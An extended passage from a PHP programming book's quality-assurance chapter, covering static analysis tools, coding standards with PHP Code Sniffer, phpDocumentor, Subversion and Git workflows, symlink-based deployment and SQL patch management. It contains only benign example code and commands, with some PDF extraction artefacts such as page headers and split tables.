Transactions:
1138 hits
Availability:
100.00 %
Elapsed time:
59.31 secs
Data transferred:
12.88 MB
Response time:
0.01 secs
Transaction rate:
19.19 trans/sec
Throughput:
0.22 MB/sec
Concurrency:
0.19
Successful transactions:
1138
Failed transactions: 0
Longest transaction:
0.06
Shortest transaction:
0.00
Again, the bold rows are the most commonly referenced. Transaction rate denotes
the number of requests per second and Failed transactions denotes the number
of requests that failed; both have the same significance as their counterparts in the
ab output.
Automated Testing
Tried and Tested
This chapter has covered several testing scenarios in PHP, including testing:
■ individual components with unit testing and behavioral testing
■ integration with a data source using database testing
■ an entire application using systems testing
■ the usage capacity of an application using load testing
Used in combination, these techniques should make you feel confident in the
quality and capability of an application prior to deploying it.
Of course, an initial outlay is required in order to develop tests, not to mention the
long-term investment to maintain them alongside code-testing. However, the true
value is in your ability to continually run testing over time, so that you’re safe in
the knowledge that expected and actual behaviors are consistent. You may even
like to consider implementing a continuous integration solution, so that the process
of repeatedly running tests is automated, and that test failures are discovered early
in development.
283
Chapter
8
Quality Assurance
This chapter follows on quite naturally from automated testing, the previous chapter.
Here, we’ll look at some of the tools that ensure our projects are of a high standard.
These include using source control to manage collaboration and project evolution,
and having automated deployment systems that can put code live without forgetting
anything—unlike a normal person. We’ll also take a look at how we can measure
our code, making sure that it’s consistent and well-formed, and how to generate
documentation from it.
These are the ingredients of a well-tooled project process, where we spend as little
time as possible on the mechanics, and as much time as possible building our interesting and successful application.
Measuring Quality with Static Analysis Tools
Static analysis is the measuring of code without running it. The tools evaluate the
code as it is, reading the files and measuring elements of it as it’s written. There are
many tools out there and, luckily for us, the best PHP ones are all freely available.
Using these tools, we can keep a high-level picture of how our codebase is looking,
286
PHP Master: Write Cutting-edge Code
even as that codebase (or selection of codebases) becomes increasingly large and
complex.
Static analysis tools are a key ingredient in our project process, but they are only
really valuable when we run them regularly, ideally with every commit. The tools
cover all kinds of aspects of our code, from counting classes and lines, to identifying
where there are similar segments of code that suggest copying and pasting has taken
place! Then, we’ll look at how static analysis tools can help us with two particularly
crucial issues in code quality: coding standards and documentation.
All the tools in this section are available through PEAR—see Appendix A for how
to install tools using this package management approach. You may also find that
many of these tools are available through the package manager on your OS (for *nixbased systems). Feel free to use this approach, but bear in mind that in many cases
they won’t be the current versions of the tools.
phploc
PHP Lines of Code (phploc) might not sound like a very interesting static analysis
tool, but it does give some interesting information, especially when it’s run repeatedly over time. It gives information about the topology of the project as well as
the size. Here’s what happens when we use it on a standard WordPress version:
$ phploc wordpress/
phploc 1.6.1 by Sebastian Bergmann.
Directories:
Files:
Lines of Code (LOC):
Cyclomatic Complexity / Lines of Code:
Comment Lines of Code (CLOC):
Non-Comment Lines of Code (NCLOC):
Namespaces:
Interfaces:
Classes:
Abstract:
Concrete:
Average Class Length (NCLOC):
Methods:
26
380
171170
0.19
53521
117649
0
0
190
0 (0.00%)
190 (100.00%)
262
1990
Quality Assurance
Scope:
Non-Static:
Static:
Visibility:
Public:
Non-Public:
Average Method Length (NCLOC):
Cyclomatic Complexity / Number of Methods:
Anonymous Functions:
Functions:
Constants:
Global constants:
Class constants:
1986 (99.80%)
4 (0.20%)
1966 (98.79%)
24 (1.21%)
25
5.56
0
2330
351
348
3
This is a lot of code, and WordPress has been around a long time, so there’s little
use of PHP 5 features. phploc is a great tool for getting a feel for how big an unfamiliar codebase is, or for following how our own codebases are growing and changing
over time. To use phploc, simply use a command like this:
phploc wordpress/
It will give output similar to that shown above, and can also write output in different
formats; for example, XML to be used by a continuous integration system.
Cyclomatic Complexity
This is a measure of, in lay terms, how many paths there are through a function—or
how complex it is—and is related to how many tests would be needed to properly
cover this code. In general, a very high score strongly indicates that the code would
benefit from refactoring to create more, shorter methods—which will be easier to
test.
phpcpd
The PHP Copy Paste detector (phpcpd) is a tool that looks for similar patterns in
code, with the aim of identifying where code has been copied and pasted around
the codebase. This is a useful tool to include in a regular build process, but the right
numbers to achieve in the output will vary from project to project. We’ll use the
287
288
PHP Master: Write Cutting-edge Code
WordPress codebase again for our example, purely because it’s a well-known open
source project:
$ phpcpd wordpress/
phpcpd 1.3.2 by Sebastian Bergmann.
Found 33 exact clones with 562 duplicated lines in 14 files:
- wp-admin/includes/update-core.php:482-500
wp-admin/includes/file.php:733-751
- wp-admin/includes/class-wp-filesystem-ssh2.php:346-365
wp-admin/includes/class-wp-filesystem-direct.php:326-345
⋮
- wp-includes/class-simplepie.php:10874-10886
wp-includes/class-simplepie.php:13185-13197
- wp-content/plugins/akismet/admin.php:488-500
wp-content/plugins/akismet/admin.php:537-549
- wp-content/plugins/akismet/legacy.php:234-248
wp-content/plugins/akismet/legacy.php:301-315
0.33% duplicated lines out of 171170 total lines of code.
Time: 6 seconds, Memory: 154.50Mb
This is particularly useful to track over time; once again, the tool is capable of outputting in an XML file, which will be understood by a continuous integration tool,
so we can easily include this in our build scripts and have the information added
to a graph over time. Looking into new instances of code that are similar is a nice
way to catch these copy/paste situations and discuss ways in which the code could
be reused. Bear in mind, though, that sometimes it just isn’t possible or sensible to
reuse code; so although it’s always worth considering the options, it’s unhelpful to
implement a zero tolerance for code that is picked up by this tool.
phpmd
The PHP Project Mess Detector (phpmd) is a tool that attempts to quantify what an
experienced developer would call “code smells.” It uses a series of metrics to find
Quality Assurance
elements of a project which seem out of kilter. This tool generates a lot of output,
but most of it is good advice; here’s a snippet resulting from asking it to check for
naming messes in WordPress:
$ phpmd wordpress/ text naming
/home/lorna/downloads/wordpress/wp-includes/widgets.php:32
/home/lorna/downloads/wordpress/wp-includes/widgets.php:76
/home/lorna/downloads/wordpress/wp-includes/widgets.php:189
/home/lorna/downloads/wordpress/wp-includes/widgets.php:319
/home/lorna/downloads/wordpress/wp-includes/widgets.php:333I
/home/lorna/downloads/wordpress/wp-includes/widgets.php:478
/home/lorna/downloads/wordpress/wp-includes/widgets.php:496
Avoid variables with short names like $id.
Classes shouldn’t have a constructor method with the same name as the class.
Avoid excessively long variable names like $wp_registered_widgets.
Classes shouldn’t have a constructor method with the same name as the class.
Avoid excessively long variable names like $wp_registered_widgets.
Avoid excessively long variable names like $wp_registered_sidebars.
Avoid extremely short variable names like $n.
Again, it’s quite likely that every project would have some output from a tool like
this, but it is very useful to use phpmd to help identify trends. There’s a comment
here [2] that the constructor shouldn’t have the same name as the class—but for
WordPress, which was PHP 4-compliant until recently, we’d expect to see this
backwards-compatible style. There are other rules included, covering items like
code size metrics, design elements (picking up uses of eval(), for example), and
also identifying unused code.
All these static analysis tools are available to help us better understand the scope
and shape of our codebases, and can show us areas to work on. In the next section,
we’ll look at how we can check that our code adheres to a coding standard.
289
290
PHP Master: Write Cutting-edge Code
Coding Standards
Coding standards is a topic of heated debate in many development teams. Since the
indentation and use of space makes no difference to how the code is executed, why
do we care about making rules about formatting and adhering to them? In truth,
we’ve become accustomed to one coding style or another, and when code is laid
out in a way that we expect, it becomes much easier to read.
It can be tricky to keep everything laid out exactly as it should be. You read the
guidelines on the project wiki for your new team, but once you get your teeth into
solving a particular problem, you soon forget which bracket is supposed to go where.
The first tactic for using the correct format is to set up your editor for elements like
line endings, whether tabs or spaces should be used, and if spaces, how many. The
second is to use a tool like PHP Code Sniffer to check all code.
Checking Coding Standards with PHP Code Sniffer
First, you’ll need to install this tool onto your server. Whether it’s on your development machine or a build server will depend entirely on the resources you have
available. PHP Code Sniffer1 is available from PEAR; refer to Appendix A on
working with PEAR for more information about installing it. Many Linux distributions also offer PHP Code Sniffer as a package.
Using PHP Code Sniffer for JavaScript and CSS
If you have JavaScript or CSS files in your projects, PHP Code Sniffer can also
check that these conform to the appropriate standards for those formats.
Once you have the tool installed, you can check your code with it. We’ll illustrate
this with a very simple example class, as shown here:
class Robot {
protected $x = 0;
protected $y = 0;
public function getCatchPhrase() {
return 'Here I am, brain the size of ...';
1
http://pear.php.net/package/PHP_CodeSniffer/
Quality Assurance
}
public function Dance() {
$xmove = rand(-2, 2);
$ymove = rand(-2, 2);
if($xmove != 0) {
$this->x += $xmove;
}
if($ymove != 0) {
$this->y += $ymove;
}
return true;
}
}
This all looks fairly standard, right? Well, let’s see what happens when we run PHP
Code Sniffer over it. We’ll use the PEAR standard for this example:
phpcs --standard=PEAR robot.php
FILE: /home/lorna/data/personal/books/Sitepoint/PHPPro/qa/code/➥
robot.php
-------------------------------------------------------------FOUND 10 ERROR(S) AND 0 WARNING(S) AFFECTING 6 LINE(S)
-------------------------------------------------------------2 | ERROR | Missing file doc comment
4 | ERROR | Opening brace of a class must be on the line after➥
the definition
4 | ERROR | You must use "/**" style comments for a class comment
8 | ERROR | Missing function doc comment
8 | ERROR | Opening brace should be on a new line
12 | ERROR | Public method name "Robot::Dance" is not in camel➥
caps format
12 | ERROR | Missing function doc comment
12 | ERROR | Opening brace should be on a new line
15 | ERROR | Expected "if (...) {\n"; found "if(...) {\n"
18 | ERROR | Expected "if (...) {\n"; found "if(...) {\n"
---------------------------------------------------------------
As you can see, we’ve ended up with 10 errors, which is a big number for a file that
was only 20 lines long to start with. Look closer, though, and you’ll see some of the
same output coming up more than once. The complaints are around missing com-
291
292
PHP Master: Write Cutting-edge Code
ments, bracket positions, and the absent space after the if() statements. We can
amend our code to fix these issues:
/**
* Robot
*
* PHP Version 5
*
* @category Example
* @package
Example
* @author
Lorna Mitchell <lorna@lornajane.net>
* @copyright 2011 Sitepoint.com
* @license
PHP Version 3.0 {@link http://www.php.net/license/➥
3_0.txt}
* @link
http://sitepoint.com
*/
class Robot
{
protected $x = 0;
protected $y = 0;
public function getCatchPhrase()
{
return 'Here I am, brain the size of ...';
}
public function dance()
{
$xmove = rand(-2, 2);
$ymove = rand(-2, 2);
if ($xmove != 0) {
$this->x += $xmove;
}
if ($ymove != 0) {
$this->y += $ymove;
}
return true;
}
}
If we run the same command again, we see that most of the objections have now
been taken care of. In fact, the only missing elements are the comment blocks for
the file and for the two functions. Since we’re going to look at inline documentation
later in this chapter, we’ll leave those out for now.
Quality Assurance
Viewing Coding Standards Violations
PHP Code Sniffer has a couple of great reporting styles that you can use to see the
“big picture” of the codebase you’re working on. These can be output to the screen
in the same way that our detailed report was, or they can be produced in other
formats. To generate a summary report, we can simply do:
phpcs --standard=PEAR --report=summary *
-----------------------------------------------------------------PHP CODE SNIFFER REPORT SUMMARY
-----------------------------------------------------------------FILE
ERRORS WARNINGS
-----------------------------------------------------------------...e/eventscontroller.php 93
10
...e/rest/index.php
29
3
...e/rest/request.php
4
0
-----------------------------------------------------------------A TOTAL OF 126 ERROR(S) AND 13 WARNING(S) WERE FOUND IN 3 FILE(S)
This data from a small sample project (actually, the RESTful service we saw in
Chapter 3) gives you an idea of how this would look. We can see how many errors
and warnings have been discovered in each file, with a final total at the bottom.
This report is available in a few formats, including CSV.
One very common format is the one used by Checkstyle,2 a Java code formatchecking tool. PHP Code Sniffer can generate XML in the same format Checkstyle
does, so that anything that can read this format can display our data. Commonly,
this is used with a continuous integration environment that will generate this data
on a regular basis, and present it in a web-based format; it will also graph how many
errors and warnings were found each time, along with which violations were fixed
and which were introduced.
PHP Code Sniffer Standards
There are several standards that ship by default with PHP Code Sniffer, and you
can create or install any of your own. To see which standards you have available,
run phpcs with the -i switch:
2
http://checkstyle.sourceforge.net/
293
294
PHP Master: Write Cutting-edge Code
phpcs -i
The installed coding standards are MySource, PEAR, Squiz, PHPCS➥
and Zend
In general, the PEAR standards are fairly widely accepted and are useful for most
teams. The Zend standards are not the current standard for Zend Framework (in
fact, Zend Framework uses an adapted version of the PEAR standards). Squiz3 is
rather a nice standard, but it is very fussy about blank lines, for example, which
can make it difficult to use for an everyday standard.
The key to an effective use of standards is to pick a standard—any standard. Then
implement it, and stop talking about coding standards, because all that matters is
that there is a standard! The argument about opening braces being on a new line or
on the same line is as old as the one about Vim vs Emacs in the text editor wars,
and neither will ever be won.
You might find, though, that you do need to adapt, or relax, one of the standards
to make it useful for your particular application. For example, an open source project,
which is built by many hands, might abolish the requirement for an @author comment because it will never be accurate. It is relatively simple to create your own
standard, particularly if you are only combining existing rules into a new standard.
PHP Code Sniffer standards consist of a series of sniffs, each one performing one
small task, such as checking for a space between an if() statement and its related
parentheses. You can easily recombine existing sniffs to create a standard that works
for your particular setting.
Documentation and Code
Most developers find writing documentation a bit of a drag. One tactic for making
the documentation of the system internals easier is to write documentation inline
with your code, in the form of comments. This means that while looking at the code,
we’re seeing the documentation.
Every function and class should have a comment. When we change code in any
way, we can add the documentation at the same time, in the same file. The coding
3
http://www.squizlabs.com/php-codesniffer
Quality Assurance
standards checks will highlight where any comments are missing, making it harder
for developers to forget to write documentation.
The comments follow a very strict pattern (as we saw in the section called “Checking
Coding Standards with PHP Code Sniffer”), so that they can be parsed into meaningful documentation. Here is an example of a single fully documented class:
/**
* Robot class code
*
* PHP Version 5
*
* @category Example
* @package
Example
* @author
Lorna Mitchell <lorna@lornajane.net>
* @copyright 2011 Sitepoint.com
* @license
PHP Version 3.0 {@link http://www.php.net/license/➥
3_0.txt}
* @link
http://sitepoint.com
*/
/**
* Robot
*
* PHP Version 5
*
* @category Example
* @package
Example
* @author
Lorna Mitchell <lorna@lornajane.net>
* @copyright 2011 Sitepoint.com
* @license
PHP Version 3.0 {@link http://www.php.net/license/➥
3_0.txt}
* @link
http://sitepoint.com
*/
class Robot
{
protected $x = 0;
protected $y = 0;
/**
* Retrieve this character's usual comment
*
* @return string The comment
*/
295
296
PHP Master: Write Cutting-edge Code
public function getCatchPhrase()
{
return 'Here I am, brain the size of ...';
}
/**
* Move the character by a random amount
*
* @return boolean true
*/
public function dance()
{
$xmove = rand(-2, 2);
$ymove = rand(-2, 2);
if ($xmove != 0) {
$this->x += $xmove;
}
if ($ymove != 0) {
$this->y += $ymove;
}
return true;
}
}
Most IDEs will generate skeleton documentation from class and method declarations,
naming the parameters, and so on. Then we can just add in the missing information
about what each variable should look like, what type it should be, and what it’s for.
Using tools to help you along makes this process quite painless—so there are no
excuses for not having documentation!
Using phpDocumentor
There are a number of tools available for turning these comments into documents.
The most established is phpDocumentor,4 which you can install from PEAR (check
Appendix A for more information about how to do this). To generate the documentation for our (admittedly very basic) project, we install phpDocumentor and then
type:
phpdoc -t docs
4
-o HTML:Smarty:PHP -d .
http://www.phpdoc.org/
Quality Assurance
The phpdoc is the name of the program, and we’re adding a few switches. The -t
switch sets the destination directory for the finished output, the -o specifies which
template to base the documentation on, and the -d indicates where the code to
document is found—in this case, the current directory. Once this completes, we
can open docs/index.html with our browser and see Figure 8.1.
Figure 8.1. Web documentation generated by phpDocumentor
This presents the information from our code file and allows us to view it in a few
different ways. We can view the information by file, as Figure 8.2 shows.
Figure 8.2. File view from phpDocumentor, showing what is in this file
Or we can view the information by class, as in Figure 8.3.
297
298
PHP Master: Write Cutting-edge Code
Figure 8.3. Showing the methods from the Robot class
While these examples are a little sparse, if you were to run this tool over a more
substantial application, you would very quickly see the detail emerging. One important point to note is that even without the code comments, phpDocumentor will
generate information about classes, method names, and so on. This means that you
can introduce the tool as part of your build process, and have a web-viewable set
of API documents very quickly—then add in the comments to improve this documentation as you go along.
This ties in very nicely with the PHP Code Sniffer tool, which can warn about
missing comments. Initially this will return a large number, but having a way of
viewing the metrics is a great motivator for a team.
Other Documentation Tools
While phpDocumentor has been a standard for many years, it is yet to evolve to
take account of the changes introduced in PHP 5.3 or later. As a result, a handful
of new tools have sprung up to fill the gap—however, none are yet mature enough
to be considered as a replacement standard. There are promising evolutions in a
few projects, including DocBlox5 and the newest versions of Doxygen,6 so do take
the time to look around for tools that will suit your particular needs.
5
6
http://www.docblox-project.org/
http://www.stack.nl/~dimitri/doxygen/index.html
Quality Assurance
Source Control
We’d hope that every project is already using some form of source control. However,
if that’s not the case, or if you’re new to the industry, this section starts at the very
beginning. We’ll discuss why source control is worth the hassle, which tools are
available, and how to set up and structure a repository in a manner that suits your
particular process. Although the general concepts are covered and apply to a wide
range of tools, we’ll use Subversion7 and Git8 to illustrate the examples shown.
Keeping control of your code and other assets is key to a successful and efficient
project, and this section gives you all you need to achieve this.
Source control is more than just a change history of code, although having the history
is really useful for those moments where you realize you’ve gone off on a tangent,
or where the client decides they liked the previous version better. For each change
that was made, there is information about:
■ who made the change
■ when it happened
■ what changed exactly
■ why this was done9
Even for a one-person project, with no collaboration or branching, it’s still a useful
feature. Keeping code in a repository also defines a central storage facility for code.
You can keep code there, pull it onto different machines, back it up, use it as the
basis for a deployment mechanism (more on that later in this chapter), and know
that you’re always working with the correct version of the code.
Source control is also a key collaboration tool. It’s designed to make the merging of
multiple sets of changes painless, and removes the need for strategies such as asking
around the office to see who made changes recently, or renaming directories with
people’s initials so that nobody else makes changes at the same time!
7
http://subversion.apache.org/
http://git-scm.com/
9
Unless you allow commit messages such as “fixed,” which is barely helpful.
8
299
300
PHP Master: Write Cutting-edge Code
Working with Centralized Version Control
Already we’re seeing some quite specific words being used, so let’s do a quick
vocabulary list to decode these:
repository
commit
check out
working copy
home of the code
to record the state of changes
to take code from the repository to work on
the code checked out from the repository
We can have many people checking out the same code from the same repository at
the same time. Each person makes changes, and commits them back to the repository.
Everyone else updates to receive those changes, and have them added in to their
current working copies. The setup is represented by Figure 8.4.
Figure 8.4. Working copies checked out from a central repository
Sometimes it can be difficult to work effectively with source control, especially
without a lot of existing source control knowledge in the team. The system can seem
to get in the way, which is not what we want from any tool. However, there are
some simple steps that can really make life easier—here are a few that have been
learned by experience:
■ update before you commit
■ have a standard convention for the naming of projects/branches
■ commit often (daily as a minimum); therefore, update often
■ keep talking about who is working on what (to avoid duplication and conflicts)
All of this is very well in theory, but the next section shows how this works in
practice using Subversion. Information on Git and distributed systems is covered
later in the chapter.
Quality Assurance
Using Subversion for Source Control
Subversion is the standard choice for most source control systems in organizations.
There is a move towards distributed systems, but there’s still a place for a simple,
centralized source control tool, especially in teams where there are junior developers
or designers working with this tool, and most people are in one or a few locations.
For now at least, Subversion is alive and well, and the Subversion project is alive,
well, and committed to being an excellent centralized solution.
Let’s run through the commands you’re most likely to need. First of all, here’s how
to check out code, receive new changes, and commit your own changes:
$ svn checkout svn://repo/project
A
project/hello.php
Checked out revision 695.
$ svn update
A
project/readme
At revision 697.
$ vim hello.php
$ svn status
M
hello.php
$ svn commit -m "Fixed bug #42 by changing the wording"
Sending
hello.php
Transmitting file data .
Committed revision 698.
First, we checked out our code to a local working copy. If you need to set up any
web server configuration, such as virtual hosts, you’d do it at this point. The following two steps—updating and committing—happen again and again as you work on
a feature, intermittently pulling in the changes from others. Once you are finished,
you’ll do one final update to make sure you’re in sync with the local repository,
and then commit your changes. Others will receive your changes when they do an
update.
This covers the most basic functions of PHP, and lets you share code easily with a
potentially very large team, so long as everything is going well. Unfortunately, that’s
not always the case! If two people make a change to the same part of the same file,
301
302
PHP Master: Write Cutting-edge Code
Subversion will not be able to make the decision about whose change should take
precedence, and will ask you for input. To do this, it will mark the file as a conflict.
Imagine our file hello.php contains the following (very basic) code:
$greeting = "hello world";
echo $greeting;
Now let’s look at what happens when two developers make changes that conflict.
Both developers check out the code at the revision shown above. The first developer
changes the greeting to be more informal:
$greeting = "hello friend";
echo $greeting;
The change is committed to the repository in the normal way, but in the meantime,
another developer has also made a change so that it now looks like this:
$message = "hello world";
echo $message;
When this second developer tries to commit the code, the commit will fail because
the files will be out of date. When both developers update, they will be notified of
a conflict, since the same line of code is changed in both the incoming version and
in the local working copy.
Since Subversion 1.5, it’s been possible to interactively resolve conflicts. When you
do this, you’ll have the option to edit the file literally in the middle of the checkout.
You can also choose to postpone the changes until later on and finish updating.
Either way, the file with the conflicts will show notation like this:
<<<<<<< .mine
$message = "hello world";
echo $message;
=======
$greeting = "hello friend";
echo $greeting;
>>>>>>> .r699
Quality Assurance
If you run svn status at this point, you’ll see that the hello.php file shows a C next
to it—this indicates its conflicted state. There are also three new files that weren’t
there before: hello.php.mine, hello.php.r698, and hello.php.r699. These contain your
code before you ran svn update, the repository version of the code from the last
time you updated or checked out, and the most recent version from the repository.
To deal with the conflicted file or files, you’ll need to manually edit the file to remove the markup that has been placed by Subversion, and set the code to the correct
version. Once you are happy that the codebase is in good shape, let Subversion
know that you’ve dealt with the files by sending the resolved command:
svn resolved hello.php
This will remove the conflicted status mark and delete the extra files that were
written. The conflict must be resolved before any further commits can be made from
this working copy.
Conflicts and Teams
It is inevitable that conflicts will occasionally occur, especially as Subversion is
unable to read PHP code, and thus can’t tell that the “conflicts” it can see on the
end of a library file are actually two new functions being added by different people.
However, regular conflicts can be a symptom of poor team communication or infrequent committing/updating. If you see conflicts on a regular basis, examine the
practices and processes of your team to decide on a way to avoid this.
Designing Repository Structure
A Subversion repository can hold many projects, and within those projects it is
common to have these directories: branches, tags, and trunk.10 The trunk holds the
main version of the code, but what about the tags and branches? Let’s define what
these are, and then talk about how to use them.
A branch is another copy of the code. We branch in order to isolate a set of changes
from the main trunk; for example, while we’re working on a major feature. Without
branching, the developer working on the feature would be unable to collaborate
with others, and wouldn’t be able to commit changes to the repository until they
10
This is a convention only—having branches and tags isn’t mandatory.
303
304
PHP Master: Write Cutting-edge Code
were certain that the feature was complete and wouldn’t break anyone else’s code.
With a branch, you have a safe area to work on code, committing as often as you
need to, and collaborating as appropriate.
A tag is simply a human-readable name representing a particular point in time in
the repository. It’s usual to tag when you want to label a particular version; it might
be a version you released, for example.
There are a few common approaches to the way that branches and tags are used
within a repository, and most teams use one of these or a variation on them. Let’s
compare them now.
Branch-per-version
This approach is most common for shrink-wrapped or library software. There is a
main trunk, but as each major version is released, a new branch comes off it. Each
time a minor point release comes out, we add a tag. So we end up with a situation
such as in Figure 8.5.
Figure 8.5. A repository showing branches and tags for a version-based release strategy
In this model, we release new versions from the branches. New development happens
on the trunk, followed by a major version release, and minor enhancements and
bug fixes along the version branch. Bug fixes may also be merged between branches,
if multiple versions of the software are in use at one time (more on merging shortly).
Quality Assurance
Branch-per-feature
This is much more common for web projects, simply because the cost of shipping
new versions is so low (especially if you have an automated deployment strategy,
which we’ll talk about in the section called “Automated Deployment”). With this
approach, we create a new branch for each new feature that we build. Most teams
tolerate some form of very quick fixing directly onto the trunk, but it is for each
team to decide when that’s acceptable. The repository ends up as represented in
Figure 8.6.
Figure 8.6. A repository with branches for notable features
For each new feature that is worked on—for example, allowing users to log in using
Twitter—a new branch is created. Then the developers working on that feature can
305
306
PHP Master: Write Cutting-edge Code
collaborate as usual, until the feature is complete. It can then be merged back into
the trunk.
Distributed Version Control
Increasingly, we’re seeing the majority of open source projects—and also some
commercial ones—moving over to use one of the distributed version control systems.
There are a few different tools in use, but the main ones are:
■ Git
■ Mercurial11 (also known as “Hg,” the chemical symbol for the element mercury)
■ Bazaar12 (also known as “bzr”)
All these tools have broadly equivalent feature sets and work on a common set of
concepts, so we’ll discuss them in high-level terms of distributed version control.
The big difference with distributed systems is that there is no central point. There
are many repositories in the system, and each one can exchange commits with one
another. Earlier we saw a centralized repository diagram in Figure 8.4. With a distributed system, we don’t check out from the central repository; instead we clone
it, making a new repository of our own. Instead of working copies, everyone has a
repository, and every repository is linked to every other repository. The layout ends
up as conceptualized in Figure 8.7.
11
12
http://mercurial.selenic.com/
http://bazaar.canonical.com/en/
Quality Assurance
Figure 8.7. The many repositories of a typical distributed system
Users can push changes from their repository to another one, and pull changes in
from any other repository. This means that there are much more flexible ways of
working than are available in the centralized systems. It also means that there is
more to know, so in general the learning curve for working with distributed systems
is steeper. It’s usual to nominate one repository as the main one, although this is
only a name and the chosen repository has no special properties. Having a main
repository simply means that this repository is backed up, and is used for the basis
of deployments.
When migrating from a centralized system, there are a few elements that work quite
differently in a distributed system. The first is that each commit is a changeset,
rather than a snapshot. A revision number refers to a set of changes, like a patch,
rather than a full export of the system. Another big change is how branches work;
since your repository is local, you can either branch on your local repository, or
mark it as a branch that you’ll share. This means that you can branch for your own
307
308
PHP Master: Write Cutting-edge Code
purposes, merge the changes into a shared branch (or throw them away), then push
the changes out to another repository.
Social Tools for Coding
It would be impossible to mention the rise of Git (and friends) without also mentioning the sites that have sprung up around it, such as GitHub.13 These sites offer
hosted source control systems, and the ability to “follow” another user and see their
activity, or the activity on a given project. They often offer wikis and issue trackers
as well, so taken altogether they provide the majority of the tools we’d need to run
a development project. The real reason behind their rise, however, is that when we
work with a distributed system, it’s very useful to be able to keep track of who else
has copies of this repository and what changes they are making. The social sites
also allow people to send us pull requests—messages asking us to bring their changes
into our main branch. In addition, many of these sites offer a web interface for performing a merge like this.
There are sites available for all kinds of source control systems, including Subversion,
that have these features. They are excellent for a project team to use, and most of
them offer free accounts for open source software, or paid-for ones more appropriate
for use by a commercial enterprise.
Using Git for Source Control
Earlier, we saw some simple examples on how to work with Subversion, so in this
section we’ll take a moment to compare it with a distributed system such as Git.
Some of the wording differs between the two approaches. With a distributed system,
we clone a repository rather than checking out from one. Using a tool like GitHub,
you might first fork the repository to create a version that you own, which is publicly
available, and which you can write to—then clone that to your local machine so
that you can work on it.
To clone a repository, we use the clone command. Here’s an example of cloning a
GitHub repository for the Joind.in open source project:
$ git clone git@github.com:lornajane/joind.in.git
Cloning into joind.in...
13
http://github.com/
Quality Assurance
This will create a local directory with the same name as the remote repository. When
we change into it, our code will be there, exactly as we expect. In order to pull in
changes from the other repositories, we first need to talk about remotes. In the example of cloning a GitHub repository, we’ll want to pull changes from the main
Joind.in project on GitHub, where it was forked from. To do this, we’ll need to add
it as a remote, and then pull in the changes:
$ git remote add upstream git@github.com:joindin/joind.in.git
$ git remote
origin
upstream
We’ve added the main Joind.in project repository as a remote called upstream,
which is a convention, but quite a useful one. When we type git remote with no
arguments, we get a list of the remotes that Git knows about, including our upstream
remote and origin—the remote that we cloned it from. We can get changes from
the upstream repository by using the pull command, like this:
$ git pull origin master
The two arguments are the remote name and the branch name that we want to pull
changes from. We can make our own changes by editing files as we usually would;
however, specifically in Git, we need to add the changed files in order to have them
included in our commit. We use git status to show us what has been changed,
which files are not tracked, and which have been added to include in the next
commit:
$ git status
# On branch master
# Changes not staged for commit:
#
(use "git add <file>..." to update what will be committed)
#
(use "git checkout -- <file>..." to discard changes in➥
working directory)
#
#
modified:
index.php
#
no changes added to commit (use "git add" and/or "git commit -a")
$ git add index.php
$ git status
309
310
PHP Master: Write Cutting-edge Code
# On branch master
# Changes to be committed:
#
(use "git reset HEAD <file>..." to unstage)
#
#
modified:
index.php
#
$ git commit -m "added comments to index.php"
Here we use git status to show us what has been changed, and then again to see
what we’ve added. Once we’ve committed the file, we can see our changes reflected
in the output of git log—but the changes still exist only in our local repository.
In order to put these changes into the remote repository, in this case the GitHub
repository, we need to push them there, by typing git push. By default, this pushes
the changes in your local repository to the one it was cloned from.
The Repository as the Root of the Build Process
Many of the other tools covered in this chapter, as well as the testing tools, are recommended to be run automatically. Some of them you might want to run in response to a new commit (such as tests and coding standard checks). You’ll also
want to have some form of automated deployment system, which we’ll talk about
in the next section. For all of these, having your code in source control enables the
tools to know where to get the code from, and how to show you what has changed
in this version.
Automated Deployment
How do you get your code onto a live platform? Many people will answer with
stories about using FTP to transfer changed files, or running SVN up on the production platform to pull in the new files. Both of these have the inherent downside of
giving some inconsistent results while the change is taking place, and offering no
means of rollback.
Avoid Source Control Artifacts on Live Platforms
Be extremely cautious when checking out of a source control system onto a live
platform. These systems work on the basis of change information stored locally,
so if your web server was to serve these publicly, you might be exposing more
Quality Assurance
information about your source code than you intended to. For example, if you’re
using Subversion, add a rule to your virtual host or .htaccess file to ban serving
anything with .svn in the path.
Instantly Switching to a New Version
A more robust approach to deployment is to set up your host so that it points to a
symlink14—a symbolic link to a target—rather than a normal directory. Then put
the code onto the server, and point the symlink at that directory. When you’re ready
to deploy a new version, transfer the new code onto the server, and get it ready. If
you need to also copy or link to configuration files, or upload files, or anything else,
you can do that now. When you’re completely ready to go, you can simply switch
the symlink over to point to the new code, with no downtime.
Using this approach also means that you can roll back your changes, whereas with
the tactic of switching a symlink, if things go really, really wrong, you can always
go back to the original version—which can be very handy in an emergency!
Managing Database Changes
This is a really tricky subject and, as much as we wish we could present a great
solution for you, there actually isn’t one that covers every use case. Most of the
solutions are variations on a theme of writing numbered database patches, keeping
a record of what number you’re up to, and then collating the two when you update
versions.
A basic example of this would be to begin with a simple database structure and
seed data, such as this:
-- init.sql
CREATE TABLE categories
(id int PRIMARY KEY auto_increment,
name VARCHAR(255));
-- seed.sql
INSERT INTO categories (name) values ('Kids');
INSERT INTO categories (name) values ('Cars');
INSERT INTO categories (name) values ('Gardening');
14
http://php.net/manual/en/function.symlink.php
311
312
PHP Master: Write Cutting-edge Code
Then, if we want to change our database schema, we first need to create a way of
managing this data. This example adds the patch control elements as a patch in its
own right, which means you can pick up and use this approach on an existing
database if you want to start managing changes to it in a more formal way. So first
we add the patching, in a file called patch00.sql:
CREATE TABLE patch_history (
patch_history_id int primary key auto_increment,
patch_number int, date_patched timestamp);
INSERT INTO patch_history SET patch_number = 0;
Let’s also create the first real patch, to illustrate what we’ll use the patch_history
table for (this will be patch01.sql):
ALTER TABLE categories ADD COLUMN description varchar(255);
INSERT INTO patch_history SET patch_number = 1;
We created the patch_history table, which shows which patches were run and when.
This gives more fine-grained information than just storing the current patch level,
which is useful if, for example, a particular patch failed but we don’t realize it immediately. By placing the statements and inserting the patch history records as the
last items in the patch files, we know these will only run if the other statement(s)
completed successfully.
The example shown performs an ALTER TABLE statement on the table. By placing
SQL into patch files and running these against your own development database,
you ensure that you have a record of all changes you’ve made. This is vital so that
we can replicate them on other platforms—development platforms as well as live
platforms.
One aspect you’ll want to consider about database change management is support
for rollback—being able to undo changes automatically, as well as perform them
automatically. In simple terms, we can deal with this by writing two SQL statements
for each change—one to implement the change, and another to remove it again. For
some changes, however, this isn’t possible. What if your statement had dropped a
column? We’re unable to roll back destructive changes of that type.
Quality Assurance
